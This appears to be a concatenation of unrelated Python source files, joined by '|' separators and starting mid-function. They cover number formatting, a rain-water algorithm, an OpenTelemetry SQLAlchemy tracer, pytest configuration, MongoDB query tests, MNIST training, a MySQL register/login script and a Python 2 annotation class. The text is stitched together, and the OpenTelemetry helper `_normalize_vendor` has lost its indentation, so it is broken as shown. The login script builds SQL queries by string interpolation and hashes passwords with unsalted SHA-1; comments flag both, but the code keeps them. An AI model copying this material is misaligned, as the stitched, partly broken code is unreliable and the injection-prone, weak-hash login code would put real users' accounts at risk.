                rounding=ROUND_HALF_UP
            )
        locale = self.request.locale
        # Fixes using "," for french locale instead of "." as for german
        if locale == 'fr_CH':
            locale = 'de_CH'
        decimal, group = self.number_symbols(locale)
        result = '{{:{},.{}f}}'.format(padding, decimal_places).format(number)
        return result.translate({ord(','): group, ord('.'): decimal})
|
from src.image import plot_function
from src.pattern_recognition import linear
#################
# Inputs
#################
def main():
    """Fit a linear decision boundary to a toy 2-class dataset and plot it."""
    samples = [
        [0, 0],
        [1, 0],
        [2, 0],
        [0, 1],
        [1, 1],
        [2, 1],
    ]
    labels = [1, 1, 1, -1, -1, -1]

    weights = linear.get_parameter_vector(samples, labels)
    slope = weights[0] / weights[1]
    intercept = -(weights[2] / weights[1])

    def boundary(x2):
        """Decision boundary expressed as x1 = f(x2)."""
        return slope * x2 + intercept

    plot_function(boundary,
                  xlabel="x2",
                  ylabel="x1",
                  title=linear.get_decision_function_str(weights))


if __name__ == '__main__':
    main()
|
from typing import List
# 方法3:
class Solution:
    """LeetCode 42 — Trapping Rain Water, solved three different ways."""

    def trap(self, height: List[int]) -> int:
        """Sweep running maxima from both ends simultaneously.

        Each index i contributes prefix_max(i) + suffix_max(n-1-i); after the
        sweep the left maximum equals the global maximum, so subtracting it
        times the length leaves exactly the trapped water.
        """
        left_best = right_best = total = 0
        for offset, bar in enumerate(height):
            left_best = max(left_best, bar)
            right_best = max(right_best, height[-1 - offset])
            total += left_best + right_best - bar
        return total - left_best * len(height)

    def trap_stack(self, height: List[int]) -> int:
        """Monotonic (decreasing) stack of bar indices."""
        if len(height) < 3:
            return 0
        water = 0
        stack = []
        for i, bar in enumerate(height):
            # A taller bar closes every basin whose bottom sits on the stack.
            while stack and bar > height[stack[-1]]:
                bottom = stack.pop()
                if not stack:
                    break  # no left wall; nothing is held
                depth = min(height[stack[-1]], bar) - height[bottom]
                width = i - stack[-1] - 1
                water += width * depth
            stack.append(i)
        return water

    def trap_dp(self, height: List[int]) -> int:
        """Precompute running maxima from both sides, then sum the gaps."""
        if not height:
            return 0
        n = len(height)
        highest_left = [0] * n
        highest_right = [0] * n
        highest_left[0] = height[0]
        highest_right[n - 1] = height[n - 1]
        for i in range(1, n):
            highest_left[i] = max(height[i], highest_left[i - 1])
        for i in range(n - 2, -1, -1):
            highest_right[i] = max(height[i], highest_right[i + 1])
        total = 0
        for i in range(n):
            bound = min(highest_left[i], highest_right[i])
            if bound > height[i]:
                total += bound - height[i]
        return total
|
import json
import os
import time
import pandas as pd
from constants import REGION_LIST
class Utils:
    """Helpers for region-code lookups and JSON persistence."""

    @staticmethod
    def get_region_name_by_code(your_code: str):
        """Return the region name for *your_code*, or '' when unknown."""
        for (code, name) in REGION_LIST:
            if your_code == code:
                return name
        return ''

    @staticmethod
    def save_json_to_file(folder_name: str, text: dict):
        """Dump *text* as JSON to ./ppwp_file/<folder_name>/ppwp_<ts>.json."""
        path = os.path.join(os.getcwd(), 'ppwp_file')
        folder_path = os.path.join(path, folder_name)
        # BUG FIX: os.mkdir() raised FileNotFoundError when the base
        # 'ppwp_file' directory did not exist yet; makedirs creates the whole
        # chain and exist_ok tolerates pre-existing directories.
        os.makedirs(folder_path, exist_ok=True)
        filepath = os.path.join(folder_path, f'ppwp_{time.time()}.json')
        with open(filepath, 'w') as outfile:
            json.dump(text, outfile)
|
import numpy as np
import pandas as pd
# Parse ./data0.txt: each record looks like "[ <state numbers> ] <action>",
# where a record's opening "[" and closing "]" may land on two different
# lines.  Collect state vectors and actions, then print how often each
# per-row maximum score occurs.
txt = "./data0.txt"
state = []
action = []
temp = ""
# BUG FIX: the file was opened without a context manager and only closed at
# the very end of the script; read it eagerly inside a `with` block instead.
with open(txt, 'r') as file:
    lines = file.readlines()
for line in lines:
    if line.find("[") != -1 and line.find("]") != -1:
        # Whole record on a single line.
        line = line.strip('\n')
        line = line.lstrip('[')
        line = line.split(']')
        line[1] = line[1].lstrip()
        data1 = line[0].split()
        action.append(line[1])
        state.append(data1)
    elif line.find("[") != -1 and line.find("]") == -1:
        # Record opens here; stash the partial state vector.
        line = line.strip('\n')
        line = line.lstrip('[')
        temp = line
    elif line.find("[") == -1 and line.find("]") != -1:
        # Record closes here; join with the stashed first half.
        line = line.strip('\n')
        line = line.split(']')
        line[1] = line[1].lstrip()
        line[1] = line[1].rstrip()
        data1 = temp.split() + line[0].split()
        action.append(line[1])
        state.append(data1)
a = np.array(state).astype(float)
b = np.array(action).astype(int)
# Frequency table of each row's maximum score.
max_score = a.max(axis=1)
score_frame = pd.DataFrame(max_score)
# The top-level pd.value_counts is deprecated; applying the Series method
# column-wise produces the same output.
print(score_frame.apply(pd.Series.value_counts))
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy.event import listen
from opentelemetry import trace
from opentelemetry.ext.sqlalchemy.version import __version__
from opentelemetry.trace.status import Status, StatusCanonicalCode
# Network attribute semantic convention here:
# https://github.com/open-telemetry/opentelemetry-specification/blob/master/specification/trace/semantic_conventions/span-general.md#general-network-connection-attributes
_HOST = "net.peer.name"
_PORT = "net.peer.port"
# Database semantic conventions here:
# https://github.com/open-telemetry/opentelemetry-specification/blob/master/specification/trace/semantic_conventions/database.md
_ROWS = "sql.rows"  # number of rows returned by a query
_STMT = "db.statement"  # the SQL text being executed
_DB = "db.type"  # canonical database vendor name (see _normalize_vendor)
_URL = "db.url"
def _normalize_vendor(vendor):
"""Return a canonical name for a type of database."""
if not vendor:
return "db" # should this ever happen?
if "sqlite" in vendor:
return "sqlite"
if "postgres" in vendor or vendor == "psycopg2":
return "postgres"
return vendor
def _get_tracer(engine, tracer_provider=None):
    """Return a tracer named after the engine's canonical vendor.

    Falls back to the globally configured provider when none is given.
    """
    provider = tracer_provider
    if provider is None:
        provider = trace.get_tracer_provider()
    return provider.get_tracer(_normalize_vendor(engine.name), __version__)
# pylint: disable=unused-argument
def _wrap_create_engine(func, module, args, kwargs):
    """Trace the SQLAlchemy engine, creating an `EngineTracer`
    object that will listen to SQLAlchemy events.
    """
    new_engine = func(*args, **kwargs)
    # The tracer registers itself via engine event listeners, so the
    # instance does not need to be kept.
    EngineTracer(_get_tracer(new_engine), None, new_engine)
    return new_engine
class EngineTracer:
    """Listens to SQLAlchemy cursor events and wraps each query in a span."""

    def __init__(self, tracer, service, engine):
        self.tracer = tracer
        self.engine = engine
        self.vendor = _normalize_vendor(engine.name)
        self.service = service or self.vendor
        self.name = "%s.query" % self.vendor
        # NOTE(review): a single ``current_span`` slot means overlapping
        # cursor executions on this engine would clobber each other's span —
        # confirm single-threaded / non-concurrent use.
        self.current_span = None
        listen(engine, "before_cursor_execute", self._before_cur_exec)
        listen(engine, "after_cursor_execute", self._after_cur_exec)
        listen(engine, "handle_error", self._handle_error)

    # pylint: disable=unused-argument
    def _before_cur_exec(self, conn, cursor, statement, *args):
        """Start a span for the statement and attach connection attributes."""
        self.current_span = self.tracer.start_span(self.name)
        with self.tracer.use_span(self.current_span, end_on_exit=False):
            self.current_span.set_attribute("service", self.vendor)
            self.current_span.set_attribute(_STMT, statement)
            # Prefer attributes from the engine URL; fall back to cursor
            # introspection when the URL carries no host.
            if not _set_attributes_from_url(
                self.current_span, conn.engine.url
            ):
                _set_attributes_from_cursor(
                    self.current_span, self.vendor, cursor
                )

    # pylint: disable=unused-argument
    def _after_cur_exec(self, conn, cursor, statement, *args):
        """Record the row count (when available) and always end the span."""
        if self.current_span is None:
            return
        try:
            if cursor and cursor.rowcount >= 0:
                self.current_span.set_attribute(_ROWS, cursor.rowcount)
        finally:
            self.current_span.end()

    def _handle_error(self, context):
        """Mark the span failed with the original exception text, then end it."""
        if self.current_span is None:
            return
        try:
            self.current_span.set_status(
                Status(
                    StatusCanonicalCode.UNKNOWN,
                    str(context.original_exception),
                )
            )
        finally:
            self.current_span.end()
def _set_attributes_from_url(span: trace.Span, url):
    """Set connection tags from the url. return true if successful."""
    attributes = ((_HOST, url.host), (_PORT, url.port), (_DB, url.database))
    for key, value in attributes:
        if value:
            span.set_attribute(key, value)
    # Only a URL that names a host counts as "successful".
    return bool(url.host)
def _set_attributes_from_cursor(span: trace.Span, vendor, cursor):
    """Attempt to set db connection attributes by introspecting the cursor."""
    # Only psycopg2 cursors are understood at the moment.
    if vendor == "postgres":
        # pylint: disable=import-outside-toplevel
        from psycopg2.extensions import parse_dsn
        if hasattr(cursor, "connection") and hasattr(cursor.connection, "dsn"):
            dsn = getattr(cursor.connection, "dsn", None)
            if dsn:
                data = parse_dsn(dsn)
                # NOTE(review): int(data.get("port")) raises TypeError when
                # the DSN omits the port — confirm DSNs always include it.
                span.set_attribute(_DB, data.get("dbname"))
                span.set_attribute(_HOST, data.get("host"))
                span.set_attribute(_PORT, int(data.get("port")))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# BUG FIX: the shebang was "#1/usr/bin/env/python" — "#1" is not a shebang
# and "/usr/bin/env/python" is not a valid interpreter path.
"""Console entry point wiring the FakeIt command into a cleo Application."""
from app.command.fakeItCommand import FakeIt
from cleo import Application

application = Application()
application.add(FakeIt())

if __name__ == '__main__':
    application.run()
|
"""
This conftest.py makes sure modules such as ``utils`` import correctly when
``pytest`` is run directly from the project root.
The file is optional; without it, run the suite with ``python -m pytest``.
"""
import os
from datetime import datetime
import pytest
from dotenv import load_dotenv
from utils.notify import Email
load_dotenv() # 将项目下的.env文件中变量添加到环境变量中
def pytest_configure(config):
    """Redirect the HTML and allure report paths into <rootdir>/reports."""
    htmlpath = config.getoption('htmlpath')
    allure_report_dir = config.getoption('allure_report_dir')
    now = datetime.now().strftime('%Y%m%d_%H%M%S')
    # Timestamp the pytest-html report name (htmlpath is a template such as
    # 'report_{}.html') and place it under <rootdir>/reports.
    # (A leftover debug print of the formatted path was removed.)
    config.option.htmlpath = os.path.join(config.rootdir, 'reports', htmlpath.format(now))
    # Allure results directory gets the same treatment.  (This was a stray
    # no-op string literal in the original, now a real comment.)
    config.option.allure_report_dir = os.path.join(config.rootdir, 'reports', allure_report_dir)
def pytest_addoption(parser):
    """Register the email-notification command-line flag and ini options."""
    parser.addoption("--send-email", action="store_true", help="发送邮件")
    for option_name, option_help in (('email_subject', '邮件主题'),
                                     ('email_receivers', '收件人'),
                                     ('email_body', '邮件正文')):
        parser.addini(option_name, help=option_help)
def pytest_terminal_summary(config):
    """After the run, email the HTML report when --send-email was given."""
    send_email = config.getoption("--send-email")
    email_receivers = config.getini('email_receivers').split(',')
    # NOTE: ''.split(',') yields [''] (truthy), so this only guards against a
    # genuinely empty list — TODO confirm whether blank receiver entries
    # should be filtered out.
    if send_email is True and email_receivers:
        report_path = config.getoption('htmlpath')
        email_subject = config.getini('email_subject') or 'TestReport'
        email_body = config.getini('email_body') or 'Hi'
        # The original repeated `if email_receivers:` here; the duplicate
        # check was removed.
        Email().send(email_subject, email_receivers, email_body, report_path)
|
# Q: pow(x, 0.5) computes the square root for non-negative x; what does
#    pow(x, 0.5) return when x is negative?
# A: a complex number
# Q: which character produces a line break in printed output?
# A: \n
# Q: val = pow(2, 1000) — return the number of digits of val in one line.
# A: len(str(val))   (the original note said len(eval(val)), but eval()
#    expects a string and val is already an int — convert with str())
# Q: what does the % operator mean?
# A: modulo (remainder)
|
#!/usr/bin/env python
import random
import time
from subprocess import call
def main():
    """Endless multiplication-table drill.

    Clears the screen, shows "x * y = ?" at a drifting position (idx newlines
    down, idy spaces right), pauses, then reveals the product.  Runs forever;
    stop with Ctrl-C.  (The unused module-level ``score`` was removed, and the
    loop now lives in main() so importing the module does not start it.)
    """
    idx = 0
    while True:
        for x in range(2, 12):
            idy = 0
            idx += 1
            for y in range(2, 12):
                idy += 1
                call(["clear"])
                # Parenthesized single-argument print is valid in both
                # Python 2 and Python 3 (the bare print statement was a
                # SyntaxError under Python 3).
                print("{0} {1} * {2} = {3}".format("\n"*idx+" "*idy, x, y, " "))
                time.sleep(1)
                call(["clear"])
                print("{0} {1} * {2} = {3}".format("\n"*idx+" "*idy, x, y, x*y))
                time.sleep(0.5)


if __name__ == '__main__':
    main()
|
from flask import Flask
app = Flask(__name__)
# Imported at the bottom, after ``app`` exists, because the views module
# imports ``app`` back from this package — the usual Flask workaround for
# the circular import.
from etsy import views
|
# encoding: utf-8
from __future__ import unicode_literals
import pytest
import operator
from collections import OrderedDict as odict
from marrow.mongo import Document, Field
from marrow.mongo.field import String, Number, Array, Embed
from marrow.mongo.query import Ops, Q
from marrow.mongo.util.compat import py3, str, unicode
class Sample(Document):
    """Fixture document exercising the field types under test."""

    class Embedded(Document):
        # Nested document used by the ``embed`` field below.
        name = String()

    generic = Field()  # untyped field
    field = String('field_name')  # stored under a different MongoDB key
    number = Number('field_name', default=27)
    array = Array(Number(default=42), name='field_name')
    embed = Embed(Embedded)

# Shared queryable used by the operator tests below.
mock_queryable = Sample.field
class TestQueryable(object): # TODO: Properly use pytest fixtures for this...
    """Tests for the Q queryable proxy: operator overloads, query helpers,
    and the MongoDB filter documents they render via ``as_query``.
    """
    # (python operator, expected Mongo operator, input value, expected query)
    # Note: numeric inputs render as strings because the field is a String.
    operators = [
            (operator.lt, '$lt', 27, {'field_name': {'$lt': '27'}}),
            (operator.le, '$lte', 27, {'field_name': {'$lte': '27'}}),
            (operator.eq, '$eq', "hOI!", {'field_name': 'hOI!'}),
            (operator.ne, '$ne', "hOI!", {'field_name': {'$ne': 'hOI!'}}),
            (operator.ge, '$gte', 27, {'field_name': {'$gte': '27'}}),
            (operator.gt, '$gt', 27, {'field_name': {'$gt': '27'}}),
        ]
    # Unary operations that take no value argument.
    singletons = [
            (operator.neg, '$exists', {'field_name': {'$exists': 0}}),
            (operator.pos, '$exists', {'field_name': {'$exists': 1}}),
            (Q.of_type, '$type', {'field_name': {'$type': 'string'}}),
        ]
    # Named query helpers; advanced[2] ($all) and advanced[4] ($size) are only
    # exercised by test_op_failure, where they must raise NotImplementedError.
    advanced = [
            (Q.any, '$in', [1, 2, 3], {'field_name': {'$in': ['1', '2', '3']}}),
            (Q.none, '$nin', [1, 2, 3], {'field_name': {'$nin': ['1', '2', '3']}}),
            (Q.all, '$all', [1, 2, 3], {'field_name': {'$all': [1, 2, 3]}}),
            (Q.match, '$elemMatch', {'name': "Bob"}, {'field_name': {'$elemMatch': {'name': 'Bob'}}}),
            (Q.size, '$size', 42, {'field_name': {'$size': 42}}),
            (Q.of_type, '$type', "double", {'field_name': {'$type': 'double'}}),
        ]
    def test_attribute_access(self):
        # Field attributes pass through the Q proxy; unknown names raise.
        assert Sample.number.default == 27
        assert Sample.array.default == 42
        assert Sample.embed.name.__name__ == 'name'
        with pytest.raises(AttributeError):
            Sample.number.asdfasdf
        with pytest.raises(AttributeError):
            Sample.embed.asdfadsf
    def test_repr(self):
        assert repr(mock_queryable) == "Q(Sample, 'field_name', String('field_name'))"
    def test_s(self):
        # The positional ("$") array projection operator.
        assert unicode(Sample.array.S) == 'field_name.$'
    def test_embedded(self):
        # Embedded field paths render dotted.
        assert unicode(Sample.embed.name) == 'embed.name'
    def do_operator(self, operator, query, value, result, mock_queryable=mock_queryable):
        """Apply a binary operator and compare the rendered query."""
        op = operator(mock_queryable, value)
        assert isinstance(op, Ops)
        assert op.as_query == result
    def do_singleton(self, operator, query, result):
        """Apply a unary operator and compare the rendered query."""
        op = operator(mock_queryable)
        assert isinstance(op, Ops)
        assert op.as_query == result
    def test_operator_lt(self): self.do_operator(*self.operators[0])
    def test_operator_lte(self): self.do_operator(*self.operators[1])
    def test_operator_eq(self): self.do_operator(*self.operators[2])
    def test_operator_ne(self): self.do_operator(*self.operators[3])
    def test_operator_gte(self): self.do_operator(*self.operators[4])
    def test_operator_gt(self): self.do_operator(*self.operators[5])
    def test_operator_neg(self): self.do_singleton(*self.singletons[0])
    def test_operator_pos(self): self.do_singleton(*self.singletons[1])
    def test_operator_any(self): self.do_operator(*self.advanced[0])
    def test_operator_none(self): self.do_operator(*self.advanced[1])
    def test_operator_match(self): self.do_operator(*self.advanced[3])
    def test_operator_type(self): self.do_operator(*self.advanced[5])
    def test_operator_type_assumed(self): self.do_singleton(*self.singletons[2])
    def test_operator_range(self):
        # range() combines $gte and $lt on a single field.
        op = Q.range(mock_queryable, 5, 11)
        assert isinstance(op, Ops)
        assert op.as_query == odict({'field_name': dict([('$gte', '5'), ('$lt', '11')])})
    def test_op_failure(self):
        # $all/$size are invalid on a String field; $size invalid on Number.
        with pytest.raises(NotImplementedError):
            self.do_operator(*self.advanced[2], mock_queryable=Sample.array)
        with pytest.raises(NotImplementedError):
            self.do_operator(*self.advanced[4])
        with pytest.raises(NotImplementedError):
            Sample.number.size(27)
    def test_operator_type_bare(self):
        # A generic Field has no intrinsic type, so of_type() renders empty.
        assert Sample.generic.of_type().as_query == {}
    def test_operator_invert(self):
        assert unicode(Sample.generic) == ~Sample.generic == 'generic'
    def test_operator_re(self):
        result = Sample.field.re(r'^', 'foo', r'\.')
        assert result.as_query == {'field_name': {'$re': r'^foo\.'}}
    def test_operator_size(self):
        result = Sample.array.size(10)
        assert result.as_query == {'field_name': {'$size': 10}}
    def test_match_query(self):
        # match() accepts another Q expression for the $elemMatch body.
        result = Sample.array.match(Sample.Embedded.name == "Alice")
        assert result.as_query == {'field_name': {'$elemMatch': {'name': "Alice"}}}
|
#coding:utf-8
import tensorflow as tf
import tensorflow.contrib.eager as tfe
from tensorflow.examples.tutorials.mnist import input_data
from tensorflow.keras.datasets import mnist
tfe.enable_eager_execution()
from tensorflow.keras import optimizers
from tensorflow.keras.datasets import cifar10, mnist
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D, Dense, Flatten, MaxPooling2D
from tensorflow.keras.callbacks import LearningRateScheduler, TensorBoard
# from IPython import embed
# from tensorflow.data.Datasets
def build_model():
    """Construct the LeNet-style CNN used for MNIST classification.

    Two conv + max-pool stages, a flatten, and a 10-way linear output
    layer (no activation on the final Dense, i.e. raw logits).
    """
    layers = [
        Conv2D(6, (5, 5), padding='valid', activation='relu',
               kernel_initializer='he_normal', input_shape=(28, 28, 1)),
        MaxPooling2D((2, 2), strides=(2, 2)),
        Conv2D(16, (5, 5), padding='valid', activation='relu',
               kernel_initializer='he_normal'),
        MaxPooling2D((2, 2), strides=(2, 2)),
        Flatten(),
        Dense(10, kernel_initializer='he_normal'),
    ]
    net = Sequential()
    for layer in layers:
        net.add(layer)
    return net
def cross_entropy(model_output, label_batch):
    """Return the mean categorical cross-entropy of *model_output* against
    one-hot *label_batch*.

    NOTE(review): applies tf.log directly, so it assumes *model_output*
    already contains probabilities (e.g. post-softmax) -- confirm callers.
    """
    per_example = -tf.reduce_sum(label_batch * tf.log(model_output),
                                 reduction_indices=[1])
    return tf.reduce_mean(per_example)
if __name__ == '__main__':
    # Load MNIST as one-hot labelled numpy arrays.
    data = input_data.read_data_sets("/media/trans/mnt/data/MNIST/", one_hot=True)
    # Fix: these were Python 2 `print` statements (`print type(data)`), a
    # SyntaxError here since the rest of this file uses the print() function.
    print(type(data))
    print(type(data.train.images))
    # (x_train, y_train), (x_test, y_test) = mnist.load_data()
    # In Docs , should be tensors generally, but numpy type works.
    train_ds = tf.data.Dataset.from_tensor_slices((data.train.images, data.train.labels)) \
        .map(lambda x, y: (x, tf.cast(y, tf.float32))) \
        .shuffle(buffer_size=1000) \
        .batch(100)
    model = build_model()
    optimizer = tf.train.GradientDescentOptimizer(0.5)
    for step, (image_batch, label_batch) in enumerate(tfe.Iterator(train_ds)):
        # Fix: a stray debug `exit(0)` at the top of this loop aborted the
        # program on the first batch, so no training ever ran.
        with tf.GradientTape() as tape:
            # Images arrive flat (784,); reshape to NHWC for the conv net.
            image_batch = tf.reshape(image_batch, (100, 28, 28, 1))
            output = model(image_batch)
            loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=output, labels=label_batch))
        gradients = tape.gradient(loss, model.variables)
        optimizer.apply_gradients(zip(gradients, model.variables))
        print("step: {} loss: {}".format(step, loss.numpy()))
    # model_test_output = model(data.test.images)
    # model_test_label = data.test.labels
    # correct_prediction = tf.equal(tf.argmax(model_test_output, 1), tf.argmax(model_test_label, 1))
    # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    # print("test accuracy = {}".format(accuracy.numpy()))
|
# eatvowels.py
def eat_vowels(s):
    """Removes the vowels from s.
    >>> eat_vowels('Apple Sauce')
    'ppl Sc'
    """
    vowels = 'aeiou'
    kept = (ch for ch in s if ch.lower() not in vowels)
    return ''.join(kept)
|
from mysqlhelper import MysqlHelper
from hashlib import sha1
from getpass import getpass
import string
# Shared connection helper bound to database 'db5'.
mysql=MysqlHelper('db5')
# Hash a string (original comment, translated from Chinese).
def update_pwd(passwd):
    """Return the SHA-1 hex digest of *passwd*.

    NOTE(review): unsalted SHA-1 is weak for password storage; consider
    hashlib.pbkdf2_hmac or a dedicated password hash.
    """
    digest = sha1()
    digest.update(passwd.encode())
    return digest.hexdigest()
# Registration function.
def register():
    """Interactively register a new user (console prompts are in Chinese):
    validate the username, check uniqueness, confirm the password, and
    insert the (username, sha1-hash) row into `user`.
    """
    while True:
        # Prompt for a username.
        username=input('请输入用户名:')
        # Walk each character of the username, rejecting punctuation/whitespace.
        all_chars=string.punctuation+string.whitespace
        for i in username:
            if i in all_chars:
                print('用户名中不能包含特殊字符')
                break
        # (A flag variable would also work.)
        else:
            # No special characters found: accept the username.
            break
    # NOTE(review): username interpolated straight into SQL -- injection
    # risk; prefer parameterized queries if MysqlHelper supports them.
    sel='select username from user where username="%s"'%username
    r=mysql.get_all(sel)
    if r:
        print('用户名已存在')
        return
    else:
        # Username is available: prompt for the password.
        passwd=getpass('请输入密码:')
        # (original comment: check whether the user already exists)
        re_passwd=getpass('请再次输入密码:')
        if passwd==re_passwd:
            # Store the user record and report success.
            # Hash the password first.
            re_passwd=update_pwd(re_passwd)
            # s=sha1()
            # s.update(re_passwd.encode())
            # re_passwd=s.hexdigest()
            ins='insert into user values ("%s","%s")'%(username,re_passwd)
            mysql.execute_sql(ins)
            print('注册成功')
        else:
            print('密码输入不一致')
            return
# Login function.
def loign():  # NOTE(review): name is a typo for `login`; kept because callers use it.
    """Interactively log a user in, looping until success or an empty
    username is entered.

    Fix: an empty username previously printed the exit message but then
    fell through and still prompted for a password; it now returns.
    """
    while True:
        username=input('请输入用户名:')
        if username=='':
            print('退出登录')
            return  # fix: actually exit instead of falling through
        passwd=getpass('请输入密码:')
        # NOTE(review): SQL built by string interpolation -- injection risk;
        # prefer parameterized queries if MysqlHelper supports them.
        sel='select passwd from user where username="%s"'%username
        r=mysql.get_all(sel)
        if r:
            # Hash the entered password the same way register() does.
            passwd=update_pwd(passwd)
            # fetchall returns a tuple of tuples: r[0][0] is the stored hash.
            if passwd==r[0][0]:
                print('登录成功')
                return
            else:
                print('密码输入错误,请重新输入')
        else:
            print('用户名不存在')
#
if __name__=='__main__':
    # Console menu loop.  NOTE(review): every valid choice ('1', '2', 'q')
    # falls through to the unconditional `break` below, so the menu exits
    # after a single register/login action -- confirm this is intended.
    while True:
        menu='''
        (1)注册
        (2)登录
        (3)退出
        请选择(1/2/q):'''
        choice=input(menu)
        if choice.strip() in ['1','2','q']:
            if choice=='1':
                print('进行注册中...')
                register()
            elif choice=='2':
                print('进行登录中...')
                loign()
            break
        else:
            # Any other input also exits (prints "exit menu").
            print('退出菜单')
            break
|
# Demo: element-wise addition of two small NumPy arrays.
import numpy
print("add two numbers")
a=numpy.array([2,3,4])
b=numpy.array([3,2,5])
print("Sum of {} and {} is {}".format(a,b,a+b))
|
###########################################################
# Module: phate_annotation.py
# Programmer: Carol L. Ecale Zhou
#
# Date of last update: October 2016 - code being modified from CGP code base
# 03 January 2017 - modified output report in method printAnnotationRecord()
# 05 January 2017 - adding code to pull dbxrefs from local database instances
# 17 July 2018 - adapted for use in building pVOGs fasta database
#
# Module containing classes and methods for representing annotation results from various sources
# Classes and methods:
# annotationRecord
# enterGFFdata(gff/dict)
# printAnnotationRecord
# printAnnotationRecord2file
# printAll
# printAll2file(fileH)
#########################################################
# This code was developed by Carol L. Ecale Zhou at Lawrence Livermore National Laboratory.
# THIS CODE IS COVERED BY THE BSD LICENSE. SEE INCLUDED FILE BSD.pdf FOR DETAILS
import re
import os
import subprocess
CHATTY = True   # verbose console output toggle
DEBUG = False   # extra debugging output toggle
p_comment = re.compile('^#')  # matches comment lines in parsed input files
class annotationRecord(object):
    """One annotation result from a single source/method: positional data
    (contig/start/end/strand), identification, and a list of annotation
    strings, plus PSAT job bookkeeping.  Python 2 module (print statements).
    """
    def __init__(self):
        self.source = "unknown" # Typically RAST, LLNL, PhAnToMe, GeneMark, Glimmer, Prodigal, PHATE, KEGG, NCBI
        self.method = "unknown" # Typcially RAST, PSAT, PFP, PhiRAST, JGI, SDSU, Blast, blastp, blastn
        self.annotationType = "unknown" # gene, mRNA, polypeptide, CDS, functional, homology
        self.contig = "unknown"
        self.start = 0
        self.end = 0
        self.strand = 'x'
        self.readingFrame = 'x'
        self.identifier = "none"
        self.locusTag = "none"
        self.name = "none" # subject hit header (i.e., database identifier provider in fasta header)
        self.description = "none" # more information: dbxref identifiers provided via lookup-tables (see above)
        self.annotationList = [] # could be multiple from single source
        self.category = "none" # functional categories: primary, sequence, structure, motif, etc.
        self.wraparound = "none" # indicates that a gene call wraps around the genome sequence as given
        # NOTE(review): self.paralogList is read by printAll2file() but is
        # never initialized here -- that method will raise AttributeError
        # unless a caller assigns it first; confirm intended attribute.
        self.psat = {
            "jobID"    : "",   # PSAT job id
            "jobName"  : "",   # PSAT job name
            "fileName" : "",   # PSAT output file
        }
        self.psatOutDir = "" # need to set
    def enterGFFdata(self,gff):  # Input a dict object with key/values as specified
        """Populate positional fields from a GFF-style dict; returns True on
        success, False if *gff* is not a dict.  Splits the 'annotation'
        value on ';' into annotationList and sets category to 'sequence'.
        """
        if isinstance(gff,dict):
            self.source = gff["source"]
            self.method = gff["method"]
            self.annotationType = gff["type"]
            self.contig = gff["contig"]
            self.start = gff["start"]
            self.end = gff["end"]
            self.strand = gff["strand"]
            self.readingFrame = gff["readingFrame"]
            annotList = gff["annotation"].split(';')
            for annot in annotList:
                self.annotationList.append(annot)
            self.category = "sequence"
            return True
        else:
            return False
    def removeRedundancy(self,inList):  # Eliminate redundancy in list; Different PSAT annotations sources can return same annotation
        """Return *inList* with duplicates removed, preserving order.
        Side effect: empties *inList* (items are pop()ed off).
        NOTE(review): uses xrange, so this is Python 2 only.
        """
        outList = []
        for i in xrange(len(inList)):
            item = inList.pop()
            if item not in inList:
                outList.append(item)
        outList.reverse()
        return outList
    # PRINT METHODS
    def printAnnotationRecord(self):
        # Compact multi-line summary to stdout.
        print "Annotation source:", self.source, '| Method:', self.method, '| Type:', self.annotationType
        print "Contig:", self.contig, "| Start:", self.start, "| End:", self.end, "| Strand:", self.strand
        print "Name:", self.name, "Description:", self.description
        print "Annotations:", self.annotationList
    def printAnnotationRecord_tabHeader(self):
        # Header row matching printAnnotationRecord_tab's column order.
        header = 'Source\tMethod\tType\tCategory\tStart-End/strand\tName\tDescription'
        print header
    def printAnnotationRecord_tab(self):
        # One tab-separated row; annotations joined with ' | '.
        annotationString = ""
        #print "Number of annotations:", len(self.annotationList)
        for annot in self.annotationList:
            annotationString += annot
            annotationString += ' | '
        tabLine = self.source + '\t' + self.method + '\t' + self.annotationType + '\t' + self.category + '\t'
        tabLine += str(self.start) + '-' + str(self.end) + '/' + self.strand + '\t'
        tabLine += self.name + '\t' + self.description + '\t' + annotationString
        print tabLine
    def printAnnotationRecord2file_tabHeader(self,FILE_HANDLE):
        # Same header as printAnnotationRecord_tabHeader, written to a file.
        header = 'Source\tMethod\tType\tCategory\tStart-End/strand\tName\tDescription'
        FILE_HANDLE.write("%s\n" % (header))
    def printAnnotationRecord2file_tab(self,FILE_HANDLE):
        # Same row format as printAnnotationRecord_tab, written to a file.
        annotationString = ""
        for annot in self.annotationList:
            annotationString += annot
            annotationString += ' | '
        tabLine = self.source + '\t' + self.method + '\t' + self.annotationType + '\t' + self.category + '\t'
        tabLine += str(self.start) + '-' + str(self.end) + '/' + self.strand + '\t'
        tabLine += self.name + '\t' + self.description + '\t' + annotationString
        FILE_HANDLE.write("%s\n" % (tabLine))
    def printAnnotationRecord2file(self,FILE_HANDLE):  #*** Update this
        # Abbreviated record dump (source/method/contig/annotations only).
        FILE_HANDLE.write("%s%s%s" % ("Annotation source:",self.source,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Method:",self.method,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Contig:",self.contig,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Annotations:",self.annotationList,"\n"))
    def printAll(self):
        # Full field-by-field dump to stdout.
        print "=== Annotation record ==="
        print "Source:", self.source
        print "Method:", self.method
        print "Type:", self.annotationType
        print "Contig:", self.contig
        print "Start:", self.start
        print "End:", self.end
        print "Strand:", self.strand
        print "Reading Frame:", self.readingFrame
        print "Identifier:", self.identifier
        print "Locus Tag:", self.locusTag
        print "Name:", self.name
        print "Description:", self.description
        print "Category:", self.category
        print "Wraparound:", self.wraparound
        print "Annotation List:"
        for annot in self.annotationList:
            print "  ", annot
        print "Category:", self.category
        print "========================"
    def printAll2file(self,FILE_HANDLE):
        # Full field-by-field dump to a file handle.
        # NOTE(review): reads self.paralogList, which __init__ never sets --
        # see the note in __init__.
